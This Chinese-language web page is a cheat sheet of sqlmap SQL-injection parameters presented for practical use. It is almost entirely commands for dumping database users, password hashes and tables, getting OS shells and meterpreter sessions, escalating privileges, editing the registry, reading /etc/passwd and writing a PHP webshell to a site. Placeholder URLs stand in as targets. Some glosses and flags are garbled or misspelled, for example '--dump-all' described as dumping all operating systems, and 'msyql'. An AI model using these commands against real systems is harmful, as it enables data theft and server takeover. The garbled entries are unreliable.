当前位置: 代码迷 >> 综合 >> SqlMap 常用参数
  详细解决方案

SqlMap 常用参数

热度:67   发布时间:2024-02-23 23:50:04.0

在实战中经常用到的sqlmap常用参数

--users #数据库用户账户
--password #数据库账户密码
--is-dba #是否为root用户
--dbs #枚举数据库
--tables #枚举数据表
--columns #枚举字段
--count #检索表的条目数
--dump #转储数据库的表项
--dump-all #转储所有操作系统
命令 注释
--os-cmd=CMD #执行cmd命令
--os-shell #建立shell
--os-pwn #获取OOB shell,meterpreter,vnc ,:sqlmap -u xxx --os-pwn msf-path /usr/share/metasploit-framework/
--os-bof #存储过程缓冲区溢出
--priv-esc #数据库进程用户权限提升
--reg-read #读取注册表项
--reg-add #添加注册表项
--reg-del #删除注册表项
--os-cmd=ipconfigsqlmap.py -m url.txt –smart –batch -m是用url.txt里面的链接批量注入 –batch自动选择 –smart快速注入python sqlmap.py -u http://192.168.0.166/php/newsshow.php?cid=4 --os-shell 得到webshell? file-read 读取web文件
sqlmap -u http://www.xxxxx.com/test.php?p=2 --file-read "/etc/passwd" -v 2
--file-read "E:\AppServ\www\index.php" -v 2
? file-write写入文件到web
sqlmap -u http://www.xxxxx.com/test.php?p=2 --file-write /localhost/mm.php --file-dest
/var/www/html/xx.php -v 2
sqlmap -u http://www.xxxxx.com/test.php?p=2 --file-write E:\AppServ\www\00\test.txt --file-dest 

组合使用

-u "" --random-agent --tamper=xxx.py --dbms=msyql/xxx --technique=BTU --time-sec 10 --level 3  
-r --random-agent --tamper=xxx.py --dbms=msyql/xxx --technique=BTU --time-sec 10 --level 3  
header 头注入
-r --hearders "client-ip: 1.1.1.1" --level 3 
--data
此参数是把数据以POST方式提交,sqlmap会像检测GET参数一样检测POST的参数。
eg:
python sqlmap.py -u "http://www.cracer.com/cracer.php" --data="id=1"